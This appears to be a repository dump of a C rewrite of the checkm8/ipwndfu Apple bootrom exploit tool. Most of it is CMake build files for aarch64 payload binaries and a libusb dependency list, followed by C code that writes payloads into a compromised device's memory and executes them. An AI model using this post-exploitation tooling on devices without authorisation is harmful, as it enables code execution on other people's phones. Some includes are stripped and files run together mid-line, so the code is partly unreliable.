checkm8_payloads/CMakeFiles/payload_sync.dir/flags.make 61 | checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o: checkm8_payloads/src/sync.c 62 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green --progress-dir=/home/toor/ipwndfu_rewrite_c/CMakeFiles --progress-num=$(CMAKE_PROGRESS_1) "Building C object checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o" 63 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-gcc $(C_DEFINES) $(C_INCLUDES) $(C_FLAGS) -o CMakeFiles/payload_sync.dir/src/sync.c.o -c /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sync.c 64 | 65 | checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.i: cmake_force 66 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green "Preprocessing C source to CMakeFiles/payload_sync.dir/src/sync.c.i" 67 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-gcc $(C_DEFINES) $(C_INCLUDES) $(C_FLAGS) -E /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sync.c > CMakeFiles/payload_sync.dir/src/sync.c.i 68 | 69 | checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.s: cmake_force 70 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green "Compiling C source to assembly CMakeFiles/payload_sync.dir/src/sync.c.s" 71 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-gcc $(C_DEFINES) $(C_INCLUDES) $(C_FLAGS) -S /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sync.c -o CMakeFiles/payload_sync.dir/src/sync.c.s 72 | 73 | checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o.requires: 74 | 75 | .PHONY : checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o.requires 76 | 77 | checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o.provides: checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o.requires 78 | $(MAKE) -f checkm8_payloads/CMakeFiles/payload_sync.dir/build.make checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o.provides.build 79 | .PHONY : checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o.provides 80 | 81 | checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o.provides.build: checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o 82 | 83 | 84 | # Object files for target payload_sync 85 | payload_sync_OBJECTS = \ 86 | "CMakeFiles/payload_sync.dir/src/sync.c.o" 87 | 88 | # External object files for target payload_sync 89 | payload_sync_EXTERNAL_OBJECTS = 90 | 91 | checkm8_payloads/payload_sync: checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o 92 | checkm8_payloads/payload_sync: checkm8_payloads/CMakeFiles/payload_sync.dir/build.make 93 | checkm8_payloads/payload_sync: checkm8_payloads/CMakeFiles/payload_sync.dir/link.txt 94 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green --bold --progress-dir=/home/toor/ipwndfu_rewrite_c/CMakeFiles --progress-num=$(CMAKE_PROGRESS_2) "Linking C executable payload_sync" 95 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && $(CMAKE_COMMAND) -E cmake_link_script CMakeFiles/payload_sync.dir/link.txt --verbose=$(VERBOSE) 96 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-objcopy -O binary -j .text -j .payload_text /home/toor/ipwndfu_rewrite_c/checkm8_payloads/payload_sync /home/toor/ipwndfu_rewrite_c/checkm8_payloads/bin/payload_sync.bin 97 | 98 | # Rule to build all files generated by this target. 99 | checkm8_payloads/CMakeFiles/payload_sync.dir/build: checkm8_payloads/payload_sync 100 | 101 | .PHONY : checkm8_payloads/CMakeFiles/payload_sync.dir/build 102 | 103 | checkm8_payloads/CMakeFiles/payload_sync.dir/requires: checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o.requires 104 | 105 | .PHONY : checkm8_payloads/CMakeFiles/payload_sync.dir/requires 106 | 107 | checkm8_payloads/CMakeFiles/payload_sync.dir/clean: 108 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && $(CMAKE_COMMAND) -P CMakeFiles/payload_sync.dir/cmake_clean.cmake 109 | .PHONY : checkm8_payloads/CMakeFiles/payload_sync.dir/clean 110 | 111 | checkm8_payloads/CMakeFiles/payload_sync.dir/depend: 112 | cd /home/toor/ipwndfu_rewrite_c && $(CMAKE_COMMAND) -E cmake_depends "Unix Makefiles" /home/toor/ipwndfu_rewrite_c /home/toor/ipwndfu_rewrite_c/checkm8_payloads /home/toor/ipwndfu_rewrite_c /home/toor/ipwndfu_rewrite_c/checkm8_payloads /home/toor/ipwndfu_rewrite_c/checkm8_payloads/CMakeFiles/payload_sync.dir/DependInfo.cmake --color=$(COLOR) 113 | .PHONY : checkm8_payloads/CMakeFiles/payload_sync.dir/depend 114 | 115 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sysreg.dir/build.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | # Delete rule output on recipe failure. 5 | .DELETE_ON_ERROR: 6 | 7 | 8 | #============================================================================= 9 | # Special targets provided by cmake. 10 | 11 | # Disable implicit rules so canonical targets will work. 12 | .SUFFIXES: 13 | 14 | 15 | # Remove some rules from gmake that .SUFFIXES does not remove. 16 | SUFFIXES = 17 | 18 | .SUFFIXES: .hpux_make_needs_suffix_list 19 | 20 | 21 | # Suppress display of executed commands. 22 | $(VERBOSE).SILENT: 23 | 24 | 25 | # A target that is always out of date. 26 | cmake_force: 27 | 28 | .PHONY : cmake_force 29 | 30 | #============================================================================= 31 | # Set environment variables for the build. 32 | 33 | # The shell in which to execute make rules. 34 | SHELL = /bin/sh 35 | 36 | # The CMake executable. 37 | CMAKE_COMMAND = /usr/bin/cmake 38 | 39 | # The command to remove a file. 40 | RM = /usr/bin/cmake -E remove -f 41 | 42 | # Escaping for special characters. 43 | EQUALS = = 44 | 45 | # The top-level source directory on which CMake was run. 46 | CMAKE_SOURCE_DIR = /home/toor/ipwndfu_rewrite_c 47 | 48 | # The top-level build directory on which CMake was run. 49 | CMAKE_BINARY_DIR = /home/toor/ipwndfu_rewrite_c 50 | 51 | # Include any dependencies generated for this target. 52 | include checkm8_payloads/CMakeFiles/payload_sysreg.dir/depend.make 53 | 54 | # Include the progress variables for this target. 55 | include checkm8_payloads/CMakeFiles/payload_sysreg.dir/progress.make 56 | 57 | # Include the compile flags for this target's objects. 58 | include checkm8_payloads/CMakeFiles/payload_sysreg.dir/flags.make 59 | 60 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o: checkm8_payloads/CMakeFiles/payload_sysreg.dir/flags.make 61 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o: checkm8_payloads/src/sysreg.c 62 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green --progress-dir=/home/toor/ipwndfu_rewrite_c/CMakeFiles --progress-num=$(CMAKE_PROGRESS_1) "Building C object checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o" 63 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-gcc $(C_DEFINES) $(C_INCLUDES) $(C_FLAGS) -o CMakeFiles/payload_sysreg.dir/src/sysreg.c.o -c /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sysreg.c 64 | 65 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.i: cmake_force 66 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green "Preprocessing C source to CMakeFiles/payload_sysreg.dir/src/sysreg.c.i" 67 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-gcc $(C_DEFINES) $(C_INCLUDES) $(C_FLAGS) -E /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sysreg.c > CMakeFiles/payload_sysreg.dir/src/sysreg.c.i 68 | 69 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.s: cmake_force 70 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green "Compiling C source to assembly CMakeFiles/payload_sysreg.dir/src/sysreg.c.s" 71 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-gcc $(C_DEFINES) $(C_INCLUDES) $(C_FLAGS) -S /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sysreg.c -o CMakeFiles/payload_sysreg.dir/src/sysreg.c.s 72 | 73 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o.requires: 74 | 75 | .PHONY : checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o.requires 76 | 77 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o.provides: checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o.requires 78 | $(MAKE) -f checkm8_payloads/CMakeFiles/payload_sysreg.dir/build.make checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o.provides.build 79 | .PHONY : checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o.provides 80 | 81 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o.provides.build: checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o 82 | 83 | 84 | # Object files for target payload_sysreg 85 | payload_sysreg_OBJECTS = \ 86 | "CMakeFiles/payload_sysreg.dir/src/sysreg.c.o" 87 | 88 | # External object files for target payload_sysreg 89 | payload_sysreg_EXTERNAL_OBJECTS = 90 | 91 | checkm8_payloads/payload_sysreg: checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o 92 | checkm8_payloads/payload_sysreg: checkm8_payloads/CMakeFiles/payload_sysreg.dir/build.make 93 | checkm8_payloads/payload_sysreg: checkm8_payloads/CMakeFiles/payload_sysreg.dir/link.txt 94 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green --bold --progress-dir=/home/toor/ipwndfu_rewrite_c/CMakeFiles --progress-num=$(CMAKE_PROGRESS_2) "Linking C executable payload_sysreg" 95 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && $(CMAKE_COMMAND) -E cmake_link_script CMakeFiles/payload_sysreg.dir/link.txt --verbose=$(VERBOSE) 96 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-objcopy -O binary -j .text -j .payload_text /home/toor/ipwndfu_rewrite_c/checkm8_payloads/payload_sysreg /home/toor/ipwndfu_rewrite_c/checkm8_payloads/bin/payload_sysreg.bin 97 | 98 | # Rule to build all files generated by this target. 99 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/build: checkm8_payloads/payload_sysreg 100 | 101 | .PHONY : checkm8_payloads/CMakeFiles/payload_sysreg.dir/build 102 | 103 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/requires: checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o.requires 104 | 105 | .PHONY : checkm8_payloads/CMakeFiles/payload_sysreg.dir/requires 106 | 107 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/clean: 108 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && $(CMAKE_COMMAND) -P CMakeFiles/payload_sysreg.dir/cmake_clean.cmake 109 | .PHONY : checkm8_payloads/CMakeFiles/payload_sysreg.dir/clean 110 | 111 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/depend: 112 | cd /home/toor/ipwndfu_rewrite_c && $(CMAKE_COMMAND) -E cmake_depends "Unix Makefiles" /home/toor/ipwndfu_rewrite_c /home/toor/ipwndfu_rewrite_c/checkm8_payloads /home/toor/ipwndfu_rewrite_c /home/toor/ipwndfu_rewrite_c/checkm8_payloads /home/toor/ipwndfu_rewrite_c/checkm8_payloads/CMakeFiles/payload_sysreg.dir/DependInfo.cmake --color=$(COLOR) 113 | .PHONY : checkm8_payloads/CMakeFiles/payload_sysreg.dir/depend 114 | 115 | -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/depend.internal: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/core.c.o 5 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/core.c 6 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/hotplug.h 7 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 8 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 9 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 10 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 11 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 12 | include/checkm8_config.h 13 | include/libusb.h 14 | include/libusb_config.h 15 | CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/descriptor.c.o 16 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/descriptor.c 17 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 18 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 19 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 20 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 21 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 22 | include/checkm8_config.h 23 | include/libusb.h 24 | include/libusb_config.h 25 | CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/hotplug.c.o 26 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/hotplug.c 27 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/hotplug.h 28 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 29 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 30 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 31 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 32 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 33 | include/checkm8_config.h 34 | include/libusb.h 35 | include/libusb_config.h 36 | CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/io.c.o 37 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/hotplug.h 38 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/io.c 39 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 40 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 41 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 42 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 43 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 44 | include/checkm8_config.h 45 | include/libusb.h 46 | include/libusb_config.h 47 | CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_netlink.c.o 48 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 49 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_netlink.c 50 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_usbfs.h 51 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 52 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 53 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 54 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 55 | include/checkm8_config.h 56 | include/libusb.h 57 | include/libusb_config.h 58 | CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_udev.c.o 59 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 60 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_udev.c 61 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_usbfs.h 62 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 63 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 64 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 65 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 66 | include/checkm8_config.h 67 | include/libusb.h 68 | include/libusb_config.h 69 | CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_usbfs.c.o 70 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 71 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_usbfs.c 72 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_usbfs.h 73 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 74 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 75 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 76 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 77 | include/checkm8_config.h 78 | include/libusb.h 79 | include/libusb_config.h 80 | CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/poll_posix.c.o 81 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 82 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.c 83 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 84 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 85 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 86 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 87 | include/checkm8_config.h 88 | include/libusb.h 89 | include/libusb_config.h 90 | CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/threads_posix.c.o 91 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 92 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 93 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.c 94 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 95 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 96 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 97 | include/checkm8_config.h 98 | include/libusb.h 99 | include/libusb_config.h 100 | CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/strerror.c.o 101 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 102 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 103 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 104 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/strerror.c 105 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 106 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 107 | include/checkm8_config.h 108 | include/libusb.h 109 | include/libusb_config.h 110 | CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/sync.c.o 111 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 112 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 113 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 114 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/sync.c 115 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 116 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 117 | include/checkm8_config.h 118 | include/libusb.h 119 | include/libusb_config.h 120 | -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/SPI.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2010 by Cristian Maglie 3 | * Copyright (c) 2014 by Paul Stoffregen (Transaction API) 4 | * Copyright (c) 2014 by Matthijs Kooijman (SPISettings AVR) 5 | * Copyright (c) 2014 by Andrew J. Kroll (atomicity fixes) 6 | * SPI Master library for arduino. 7 | * 8 | * This file is free software; you can redistribute it and/or modify 9 | * it under the terms of either the GNU General Public License version 2 10 | * or the GNU Lesser General Public License version 2.1, both as 11 | * published by the Free Software Foundation. 12 | */ 13 | 14 | #include "SPI.h" 15 | 16 | SPIClass SPI; 17 | 18 | uint8_t SPIClass::initialized = 0; 19 | uint8_t SPIClass::interruptMode = 0; 20 | uint8_t SPIClass::interruptMask = 0; 21 | uint8_t SPIClass::interruptSave = 0; 22 | #ifdef SPI_TRANSACTION_MISMATCH_LED 23 | uint8_t SPIClass::inTransactionFlag = 0; 24 | #endif 25 | 26 | void SPIClass::begin() 27 | { 28 | uint8_t sreg = SREG; 29 | noInterrupts(); // Protect from a scheduler and prevent transactionBegin 30 | if (!initialized) { 31 | // Set SS to high so a connected chip will be "deselected" by default 32 | uint8_t port = digitalPinToPort(SS); 33 | uint8_t bit = digitalPinToBitMask(SS); 34 | volatile uint8_t *reg = portModeRegister(port); 35 | 36 | // if the SS pin is not already configured as an output 37 | // then set it high (to enable the internal pull-up resistor) 38 | if(!(*reg & bit)){ 39 | digitalWrite(SS, HIGH); 40 | } 41 | 42 | // When the SS pin is set as OUTPUT, it can be used as 43 | // a general purpose output port (it doesn't influence 44 | // SPI operations). 45 | pinMode(SS, OUTPUT); 46 | 47 | // Warning: if the SS pin ever becomes a LOW INPUT then SPI 48 | // automatically switches to Slave, so the data direction of 49 | // the SS pin MUST be kept as OUTPUT. 50 | SPCR |= _BV(MSTR); 51 | SPCR |= _BV(SPE); 52 | 53 | // Set direction register for SCK and MOSI pin. 54 | // MISO pin automatically overrides to INPUT. 55 | // By doing this AFTER enabling SPI, we avoid accidentally 56 | // clocking in a single bit since the lines go directly 57 | // from "input" to SPI control. 58 | // http://code.google.com/p/arduino/issues/detail?id=888 59 | pinMode(SCK, OUTPUT); 60 | pinMode(MOSI, OUTPUT); 61 | } 62 | initialized++; // reference count 63 | SREG = sreg; 64 | } 65 | 66 | void SPIClass::end() { 67 | uint8_t sreg = SREG; 68 | noInterrupts(); // Protect from a scheduler and prevent transactionBegin 69 | // Decrease the reference counter 70 | if (initialized) 71 | initialized--; 72 | // If there are no more references disable SPI 73 | if (!initialized) { 74 | SPCR &= ~_BV(SPE); 75 | interruptMode = 0; 76 | #ifdef SPI_TRANSACTION_MISMATCH_LED 77 | inTransactionFlag = 0; 78 | #endif 79 | } 80 | SREG = sreg; 81 | } 82 | 83 | // mapping of interrupt numbers to bits within SPI_AVR_EIMSK 84 | #if defined(__AVR_ATmega32U4__) 85 | #define SPI_INT0_MASK (1< 4 | #include 5 | #include 6 | 7 | #include "command.h" 8 | #include "libusb_helpers.h" 9 | 10 | 11 | struct payload 12 | { 13 | PAYLOAD_T type; 14 | unsigned char *data; 15 | int len; 16 | 17 | long long install_base; 18 | struct payload *next; 19 | struct payload *prev; 20 | }; 21 | 22 | struct payload *get_payload(PAYLOAD_T p) 23 | { 24 | FILE *payload_file; 25 | struct payload *res; 26 | char *path; 27 | 28 | switch(p) 29 | { 30 | case PAYLOAD_SYNC: 31 | path = PAYLOAD_SYNC_BIN; 32 | break; 33 | 34 | case PAYLOAD_AES: 35 | path = PAYLOAD_AES_BIN; 36 | break; 37 | 38 | case PAYLOAD_SYSREG: 39 | path = PAYLOAD_SYSREG_BIN; 40 | break; 41 | 42 | default: 43 | return NULL; 44 | } 45 | 46 | res = malloc(sizeof(struct payload)); 47 | if(res == NULL) return NULL; 48 | 49 | if((payload_file = fopen(path, "rb")) == NULL) 50 | { 51 | free(res); 52 | return NULL; 53 | } 54 | 55 | fseek(payload_file, 0, SEEK_END); 56 | res->type = p; 57 | res->len = ftell(payload_file); 58 | res->data = malloc(res->len); 59 | res->install_base = -1; 60 | res->next = NULL; 61 | res->prev = NULL; 62 | 63 | rewind(payload_file); 64 | fread(res->data, 1, res->len, payload_file); 65 | fclose(payload_file); 66 | 67 | return res; 68 | } 69 | 70 | void free_payload(struct payload *p) 71 | { 72 | free(p->data); 73 | free(p); 74 | } 75 | 76 | long long curr_address = 0x180150000; 77 | long long get_address(struct pwned_device *dev, LOCATION_T l) 78 | { 79 | //TODO: make an actual memory allocator 80 | long long ret = curr_address; 81 | curr_address += 0x1000; 82 | return ret; 83 | } 84 | 85 | 86 | struct payload *dev_retrieve_payload(struct pwned_device *dev, PAYLOAD_T p) 87 | { 88 | struct payload *curr; 89 | for(curr = dev->installed; curr != NULL; curr = curr->next) 90 | { 91 | if(curr->type == p) return curr; 92 | } 93 | 94 | return NULL; 95 | } 96 | 97 | int dev_link_payload(struct pwned_device *dev, struct payload *pl) 98 | { 99 | struct payload *curr; 100 | if(dev->installed == NULL) 101 | { 102 | dev->installed = pl; 103 | return CHECKM8_SUCCESS; 104 | } 105 | else 106 | { 107 | for(curr = dev->installed; curr->next != NULL; curr = curr->next); 108 | 109 | curr->next = pl; 110 | pl->prev = curr; 111 | return CHECKM8_SUCCESS; 112 | } 113 | } 114 | 115 | int *dev_unlink_payload(struct pwned_device *dev, struct payload *pl) 116 | { 117 | if(dev->installed == pl) 118 | { 119 | dev->installed = NULL; 120 | return CHECKM8_SUCCESS; 121 | } 122 | else 123 | { 124 | pl->prev->next = pl->next; 125 | pl->next->prev = pl->prev; 126 | return CHECKM8_SUCCESS; 127 | } 128 | } 129 | 130 | 131 | int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc) 132 | { 133 | checkm8_debug_indent("install_payload(dev = %p, p = %i, loc = %i)\n", dev, p, loc); 134 | int i, ret; 135 | struct dev_cmd_resp *resp = NULL; 136 | struct payload *pl = get_payload(p); 137 | long long addr = get_address(dev, loc); 138 | 139 | if(pl == NULL || addr == -1) return CHECKM8_FAIL_INVARGS; 140 | 141 | ret = get_device_bundle(dev); 142 | if(IS_CHECKM8_FAIL(ret)) return ret; 143 | 144 | resp = dev_write_memory(dev, addr, pl->data, pl->len); 145 | if(IS_CHECKM8_FAIL(resp->ret)) 146 | { 147 | free_dev_cmd_resp(resp); 148 | release_device_bundle(dev); 149 | return CHECKM8_FAIL_XFER; 150 | } 151 | 152 | checkm8_debug_indent("\tdone copying and linking payload\n"); 153 | pl->install_base = addr; 154 | dev_link_payload(dev, pl); 155 | 156 | free_dev_cmd_resp(resp); 157 | release_device_bundle(dev); 158 | return ret; 159 | } 160 | 161 | int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p) 162 | { 163 | //TODO: free memory in memory allocator 164 | } 165 | 166 | struct dev_cmd_resp *execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...) 167 | { 168 | checkm8_debug_indent("execute_payload(dev = %p, p = %i, nargs = %i, ...)\n", dev, p, nargs); 169 | int ret, i; 170 | struct dev_cmd_resp *resp; 171 | struct payload *pl; 172 | 173 | if((pl = dev_retrieve_payload(dev, p)) == NULL) 174 | { 175 | checkm8_debug_indent("\tpayload is not installed\n"); 176 | resp = calloc(1, sizeof(struct dev_cmd_resp)); 177 | resp->ret = CHECKM8_FAIL_NOINST; 178 | return resp; 179 | } 180 | 181 | ret = get_device_bundle(dev); 182 | if(IS_CHECKM8_FAIL(ret)) 183 | { 184 | resp = calloc(1, sizeof(struct dev_cmd_resp)); 185 | resp->ret = ret; 186 | return resp; 187 | } 188 | 189 | unsigned long long args[nargs + 1]; 190 | args[0] = pl->install_base; 191 | checkm8_debug_indent("\tinstall base is 0x%lX\n", args[0]); 192 | 193 | va_list arg_list; 194 | va_start(arg_list, nargs); 195 | for(i = 0; i < nargs; i++) 196 | { 197 | args[i + 1] = va_arg(arg_list, unsigned long long); 198 | checkm8_debug_indent("\textracted arg %lx\n", args[i + 1]); 199 | } 200 | va_end(arg_list); 201 | 202 | resp = dev_exec(dev, 16, nargs + 1, args); 203 | release_device_bundle(dev); 204 | return resp; 205 | } 206 | 207 | struct dev_cmd_resp *read_payload(struct pwned_device *dev, long long addr, int len) 208 | { 209 | checkm8_debug_indent("read_payload(dev = %p, addr = %lx, len = %i)\n", dev, addr, len); 210 | int ret; 211 | struct dev_cmd_resp *resp; 212 | 213 | ret = get_device_bundle(dev); 214 | if(IS_CHECKM8_FAIL(ret)) 215 | { 216 | checkm8_debug_indent("\tfailed to get device bundle\n"); 217 | resp = calloc(1, sizeof(struct dev_cmd_resp)); 218 | resp->ret = ret; 219 | return resp; 220 | } 221 | 222 | resp = dev_read_memory(dev, addr, len); 223 | release_device_bundle(dev); 224 | return resp; 225 | } 226 | 227 | struct dev_cmd_resp *write_payload(struct pwned_device *dev, long long addr, unsigned char *data, int len) 228 | { 229 | checkm8_debug_indent("write_payload(dev = %p, addr = %lx, data = %p, len = %i)\n", dev, addr, data, len); 230 | int ret; 231 | struct dev_cmd_resp *resp; 232 | 233 | ret = get_device_bundle(dev); 234 | if(IS_CHECKM8_FAIL(ret)) 235 | { 236 